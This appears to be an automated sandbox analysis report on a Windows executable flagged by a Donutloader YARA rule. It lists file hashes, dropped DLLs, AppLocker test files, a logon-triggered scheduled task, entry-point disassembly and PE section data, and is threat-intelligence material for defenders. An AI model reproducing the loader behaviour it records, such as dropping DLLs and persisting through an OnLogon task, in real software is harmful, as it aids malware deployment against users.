                                                            SSDEEP:768:3SR/d8civCTlNQHE64vMXuyMcS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:Q/dSCoHE6wE7McS7i9u6yeNejY6yFOB
                                                            MD5:8AA72F47438EEBD6FE0E8C94BD206CA8
                                                            SHA1:6B9AD499F5C9E71294E3086A8C6E56F3B5C4590F
                                                            SHA-256:E45B9DFCCD0EEE7F4D676E2AAA74D8FE0238A3B37E2B21A9182C283B70D6A2FD
                                                            SHA-512:A5315D541B118D72997204FA983EBB0046F8B8D09EABEDFC1C1BCC55200B5191611697F2B9BE9B065656FDBC7BE6CE2BC0328BD03BDCD45A7A11384D1B199400
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files (x86)\Everything\4.bin, Author: unknown
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):423
                                                            Entropy (8bit):5.620481328829655
                                                            Encrypted:false
                                                            SSDEEP:12:TM3iu5veHcwUUDmQ78EdJNLUeb/XOaGUPUG/JqO11Xbv:qV5jwNAERUeb/++Uu1BL
                                                            MD5:561717380FDFAE01A131820560486692
                                                            SHA1:8B8EE9B7AD1649145E736B9F4EED51C05AB0270A
                                                            SHA-256:09A9951F431128FECD536D9A0C693133FD9B535529E6E660C331CA0FB073464F
                                                            SHA-512:0F5130DF82C45D9C1D84A4605A56E8EE2792E3091F85F560919FEE4832980242AC71E6F30EB42EBA26B51E31D5022BE8D328723077F0E3030BB829ADC3A54C29
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>NoSuchKey</Code>..<Message>The specified key does not exist.</Message>..<Resource>/1.exe</Resource>..<RequestId>NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MzA1MGE0MTEyY2JkYThjZGM1ZTg3MTIxMTlhMjg0M2Y=</TraceId>.</Error>..
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):455160
                                                            Entropy (8bit):6.695463462044302
                                                            Encrypted:false
                                                            SSDEEP:12288:aZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77m:a/8wVwHZFTwFOOos3Ooc8DHkC2e77m
                                                            MD5:50260B0F19AAA7E37C4082FECEF8FF41
                                                            SHA1:CE672489B29BAA7119881497ED5044B21AD8FE30
                                                            SHA-256:891603D569FC6F1AFED7C7D935B0A3C7363C35A0EB4A76C9E57EF083955BC2C9
                                                            SHA-512:6F99D39BFE9D4126417FF65571C78C279D75FC9547EE767A594620C0C6F45F4BB42FD0C5173D9BC91A68A0636205A637D5D1C7847BD5F8CE57E120D210B0C57D
                                                            Malicious:false
                                                            Joe Sandbox View:
                                                            • Filename: SecuriteInfo.com.Win32.Malware.Dropper.Heur.12585.3788.exe, Detection: malicious
                                                            • Filename: N-9hndmrcq j9uj93.msi, Detection: malicious
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):446840
                                                            Entropy (8bit):6.690279428020546
                                                            Encrypted:false
                                                            SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                            MD5:C766CA0482DFE588576074B9ED467E38
                                                            SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                            SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                            SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                            Malicious:false
                                                            Joe Sandbox View:
                                                            • Filename: LisectAVT_2403002B_246.exe, Detection: malicious
                                                            • Filename: LisectAVT_2403002B_246.exe, Detection: malicious
                                                            • Filename: LisectAVT_2403002B_295.exe, Detection: malicious
                                                            • Filename: LisectAVT_2403002B_295.exe, Detection: malicious
                                                            • Filename: LisectAVT_2403002B_78.exe, Detection: malicious
                                                            • Filename: LisectAVT_2403002B_78.exe, Detection: malicious
                                                            • Filename: 2024po.exe, Detection: malicious
                                                            • Filename: 2024po.exe, Detection: malicious
                                                            • Filename: psqlodbc-setup.exe, Detection: malicious
                                                            Reputation:moderate, very likely benign file
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):970744
                                                            Entropy (8bit):6.964896388792595
                                                            Encrypted:false
                                                            SSDEEP:12288:6BmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJSH:SmFyjLF847eiWWcoGZVOIxh/WxIAIbu
                                                            MD5:50097EC217CE0EBB9B4CAA09CD2CD73A
                                                            SHA1:8CD3018C4170072464FBCD7CBA563DF1FC2B884C
                                                            SHA-256:2A2FF2C61977079205C503E0BCFB96BF7AA4D5C9A0D1B1B62D3A49A9AA988112
                                                            SHA-512:AC2D02E9BFC2BE4C3CB1C2FFF41A2DAFCB7CE1123998BBF3EB5B4DC6410C308F506451DE9564F7F28EB684D8119FB6AFE459AB87237DF7956F4256892BBAB058
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):91104
                                                            Entropy (8bit):6.919609919273454
                                                            Encrypted:false
                                                            SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                            MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                            SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                            SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                            SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):219584
                                                            Entropy (8bit):6.1663383385555814
                                                            Encrypted:false
                                                            SSDEEP:3072:0Kip9MQPBN+xPYpaEjlFORHc+hmTb2vNESkT6rQxCqCp4fCw4mCD4pbu:0D5N+6fjlURHcTbMNSTbxupfwADL
                                                            MD5:E864FE41A4FEDEC386A65CB456CA3066
                                                            SHA1:3BEE65E903573E7CDB0592F3519F98BDCDE493C3
                                                            SHA-256:06871B2A233E56C57741FD40EC1D298D306C60FCBF5236832C4CE98FF34D8DCA
                                                            SHA-512:4E8C0EB8F2642BA210C53C5CF4379D2F89A1130B148C934B79ACD32B2B77257A18C24173AEF36877C64C46E709EB4A622CF69A352DCEBE97ACCB432F5D886317
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):4077
                                                            Entropy (8bit):5.351303423945478
                                                            Encrypted:false
                                                            SSDEEP:96:iqlYqh3oEFxtIIVMcCgAhMFKrJcqFfr0U1tI6eqzNqMRniAqU57UMq4hS:iqlYqh37IIVMvJcq5dtI6eqzNqM51qUA
                                                            MD5:BDC14B6EA42EEA6E0D8B536DBC9DCDB0
                                                            SHA1:EEEDB8B60B2FC49C9D12D1FD267146AFF55E6ECC
                                                            SHA-256:CDE89D8254F2C6AF2FC1F4F12A8CB77401543F5BE05EE6080518F47DF73FA014
                                                            SHA-512:0CDCDE0E18F1C36DA7525FA8FE463720103245E97194D9C86E515F7374C425228DBFCFF22148AC46AD50BFABE2CB0FCC6B90118833777D35CA6F183C09B7F68F
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\7ae6ae69c7471e5e034a046629402c6a\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\5484a7638cf633fd03f0dcd66df5a16d\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):446840
                                                            Entropy (8bit):6.690279428020546
                                                            Encrypted:false
                                                            SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                            MD5:C766CA0482DFE588576074B9ED467E38
                                                            SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                            SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                            SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):40917
                                                            Entropy (8bit):7.28053200206121
                                                            Encrypted:false
                                                            SSDEEP:768:3SR/d8civCTlNQHE64vMXuyMcS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:Q/dSCoHE6wE7McS7i9u6yeNejY6yFOB
                                                            MD5:8AA72F47438EEBD6FE0E8C94BD206CA8
                                                            SHA1:6B9AD499F5C9E71294E3086A8C6E56F3B5C4590F
                                                            SHA-256:E45B9DFCCD0EEE7F4D676E2AAA74D8FE0238A3B37E2B21A9182C283B70D6A2FD
                                                            SHA-512:A5315D541B118D72997204FA983EBB0046F8B8D09EABEDFC1C1BCC55200B5191611697F2B9BE9B065656FDBC7BE6CE2BC0328BD03BDCD45A7A11384D1B199400
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin, Author: unknown
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):91104
                                                            Entropy (8bit):6.919609919273454
                                                            Encrypted:false
                                                            SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                            MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                            SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                            SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                            SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):455160
                                                            Entropy (8bit):6.695463462044302
                                                            Encrypted:false
                                                            SSDEEP:12288:aZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77m:a/8wVwHZFTwFOOos3Ooc8DHkC2e77m
                                                            MD5:50260B0F19AAA7E37C4082FECEF8FF41
                                                            SHA1:CE672489B29BAA7119881497ED5044B21AD8FE30
                                                            SHA-256:891603D569FC6F1AFED7C7D935B0A3C7363C35A0EB4A76C9E57EF083955BC2C9
                                                            SHA-512:6F99D39BFE9D4126417FF65571C78C279D75FC9547EE767A594620C0C6F45F4BB42FD0C5173D9BC91A68A0636205A637D5D1C7847BD5F8CE57E120D210B0C57D
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):970744
                                                            Entropy (8bit):6.964896388792595
                                                            Encrypted:false
                                                            SSDEEP:12288:6BmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJSH:SmFyjLF847eiWWcoGZVOIxh/WxIAIbu
                                                            MD5:50097EC217CE0EBB9B4CAA09CD2CD73A
                                                            SHA1:8CD3018C4170072464FBCD7CBA563DF1FC2B884C
                                                            SHA-256:2A2FF2C61977079205C503E0BCFB96BF7AA4D5C9A0D1B1B62D3A49A9AA988112
                                                            SHA-512:AC2D02E9BFC2BE4C3CB1C2FFF41A2DAFCB7CE1123998BBF3EB5B4DC6410C308F506451DE9564F7F28EB684D8119FB6AFE459AB87237DF7956F4256892BBAB058
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):219584
                                                            Entropy (8bit):6.1663383385555814
                                                            Encrypted:false
                                                            SSDEEP:3072:0Kip9MQPBN+xPYpaEjlFORHc+hmTb2vNESkT6rQxCqCp4fCw4mCD4pbu:0D5N+6fjlURHcTbMNSTbxupfwADL
                                                            MD5:E864FE41A4FEDEC386A65CB456CA3066
                                                            SHA1:3BEE65E903573E7CDB0592F3519F98BDCDE493C3
                                                            SHA-256:06871B2A233E56C57741FD40EC1D298D306C60FCBF5236832C4CE98FF34D8DCA
                                                            SHA-512:4E8C0EB8F2642BA210C53C5CF4379D2F89A1130B148C934B79ACD32B2B77257A18C24173AEF36877C64C46E709EB4A622CF69A352DCEBE97ACCB432F5D886317
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):349
                                                            Entropy (8bit):2.4642354644001863
                                                            Encrypted:false
                                                            SSDEEP:3:OxA6x/MF+AtnoUa/Z/aEjCCNFqP1SXsIISXSII/6JFFTCQor/rZ:Od/4+ARo7/hX0qIGICLhojF
                                                            MD5:FE8FE166EC4836ACD97EEF02211F6612
                                                            SHA1:D967948AC32F993C2C8F877F1E455ABEE2CE08A0
                                                            SHA-256:FCA89EB419B97B702109F2863667306FE085BAB9F31F2D4B77E48A26CACC4E9F
                                                            SHA-512:2A76B10D66D6227B68320AC57432D15A82FEC89520AF7FDE60C458F745880777007008A7538539F790005AE2970CBF381A8CCEAE93E602E4C73DEDAD48ADF872
                                                            Malicious:false
                                                            Preview:Not Windows 7. Continuing with the rest of the code.......TaskPath TaskName State ..-------- -------- ----- ..\ OnLogon Ready ..........ok..
                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.497862673770642
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:LisectAVT_2403002B_185.exe
                                                            File size:328'552 bytes
                                                            MD5:0aafd40537a281b281bd85efcb2c976b
                                                            SHA1:d9b7aa59133586c9f885899b0483117500460036
                                                            SHA256:89daf7a9b800a5d38cf93accc70b5f24568aa65353e2c1b44199159a8cf888fb
                                                            SHA512:91ff154a67a4462982581e1191f91d0ac10a47b93d339f7f152bb8f97a7eec3f84e97b9a46484fa1165ffa9f9f12200ca11fb4cc814d4ad5743618a15e37ce85
                                                            SSDEEP:6144:zqgHVf5iIZrJCt6nn01HZLj0DubeeBKjMvtwAOMX2HgzxdQacEdY:zpVBX9JCtJB9w5acH
                                                            TLSH:45645B0175418432E7660B3149E9EAF9492DAD740B94A8DFE3E83E7E4E712D36A3311F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..^............A.......A.......A.......X.......X.......X...F...A...........f.....................|.............Rich...........
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x409ffb
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x65FC8D9A [Thu Mar 21 19:42:18 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:0551946c53eef862268f699870a0319b
                                                            Signature Valid:false
                                                            Signature Issuer:CN=GlobalSign CodeSigning CA - G3, O=GlobalSign nv-sa, C=BE
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 18/02/2020 22:11:49 18/02/2023 04:42:26
                                                            Subject Chain
                                                            • CN="BEIJING KUWO TECHNOLOGY CO.,LTD.", O="BEIJING KUWO TECHNOLOGY CO.,LTD.", L=Beijing, S=Beijing, C=CN
                                                            Version:3
                                                            Thumbprint MD5:A8E70CC9BA3E5602D7C4F6BC5A516542
                                                            Thumbprint SHA-1:B4BC05741C5F8EF6AC8863D2A737B5444DB63ED8
                                                            Thumbprint SHA-256:9214C7372F243EC5071BA66562243A8845CB3FD2F647BF39B81BD7BB419DB915
                                                            Serial:60CEB993776A1B86387AE3F0
                                                            Instruction
                                                            call 00007FE790E4D889h
                                                            jmp 00007FE790E4D2A9h
                                                            push ebp
                                                            mov ebp, esp
                                                            mov eax, dword ptr [ebp+08h]
                                                            push esi
                                                            mov ecx, dword ptr [eax+3Ch]
                                                            add ecx, eax
                                                            movzx eax, word ptr [ecx+14h]
                                                            lea edx, dword ptr [ecx+18h]
                                                            add edx, eax
                                                            movzx eax, word ptr [ecx+06h]
                                                            imul esi, eax, 28h
                                                            add esi, edx
                                                            cmp edx, esi
                                                            je 00007FE790E4D44Bh
                                                            mov ecx, dword ptr [ebp+0Ch]
                                                            cmp ecx, dword ptr [edx+0Ch]
                                                            jc 00007FE790E4D43Ch
                                                            mov eax, dword ptr [edx+08h]
                                                            add eax, dword ptr [edx+0Ch]
                                                            cmp ecx, eax
                                                            jc 00007FE790E4D43Eh
                                                            add edx, 28h
                                                            cmp edx, esi
                                                            jne 00007FE790E4D41Ch
                                                            xor eax, eax
                                                            pop esi
                                                            pop ebp
                                                            ret
                                                            mov eax, edx
                                                            jmp 00007FE790E4D42Bh
                                                            push esi
                                                            call 00007FE790E4DD3Ch
                                                            test eax, eax
                                                            je 00007FE790E4D452h
                                                            mov eax, dword ptr fs:[00000018h]
                                                            mov esi, 00439230h
                                                            mov edx, dword ptr [eax+04h]
                                                            jmp 00007FE790E4D436h
                                                            cmp edx, eax
                                                            je 00007FE790E4D442h
                                                            xor eax, eax
                                                            mov ecx, edx
                                                            lock cmpxchg dword ptr [esi], ecx
                                                            test eax, eax
                                                            jne 00007FE790E4D422h
                                                            xor al, al
                                                            pop esi
                                                            ret
                                                            mov al, 01h
                                                            pop esi
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            cmp dword ptr [ebp+08h], 00000000h
                                                            jne 00007FE790E4D439h
                                                            mov byte ptr [00439234h], 00000001h
                                                            call 00007FE790E4DB2Ah
                                                            call 00007FE790E4FD4Eh
                                                            test al, al
                                                            jne 00007FE790E4D436h
                                                            xor al, al
                                                            pop ebp
                                                            ret
                                                            call 00007FE790E589C5h
                                                            test al, al
                                                            jne 00007FE790E4D43Ch
                                                            push 00000000h
                                                            call 00007FE790E4FD55h
                                                            pop ecx
                                                            jmp 00007FE790E4D41Bh
                                                            mov al, 01h
                                                            pop ebp
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            cmp byte ptr [00439235h], 00000000h
                                                            je 00007FE790E4D436h
                                                            mov al, 01h
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36fa0 | 0x64 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0x139c0 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4d200 | 0x3168 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4e000 | 0x1d78 | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x34b1c | 0x38 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34b58 | 0x40 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x29000 | 0x190 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x1000 | 0x27b48 | 0x27c00 | f9369b3de80dc2c86a013e9c45987826 | False | 0.5549270341981132 | data | 6.5674932450931145 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata | 0x29000 | 0xe8b6 | 0xea00 | d8cb14d23420e608b6e529be084f5c2f | False | 0.5098490918803419 | OpenPGP Secret Key Version 3 | 5.550865699729164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data | 0x38000 | 0x1d6c | 0x1000 | 7189b1f5fdb48443940180984db65284 | False | 0.1962890625 | DOS executable (block device driver) | 3.171188272220345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc | 0x3a000 | 0x139c0 | 0x13a00 | 61637e6f774bdd5046dba2a5bfd1ffc0 | False | 0.28734574044585987 | data | 5.572749455643106 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0x4e000 | 0x1d78 | 0x1e00 | 34c18553d7f180cce18f79b006cd2e7b | False | 0.7430989583333333 | data | 6.4748070259396195 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            EXE | 0x3a0f0 | 0x13368 | PE32 executable (GUI) Intel 80386, for MS Windows | Chinese | China | 0.28584680288705905
                                                            RT_VERSION | 0x4d458 | 0x3e0 | data | Chinese | China | 0.4586693548387097
                                                            RT_MANIFEST | 0x4d838 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
                                                            DLL | Import
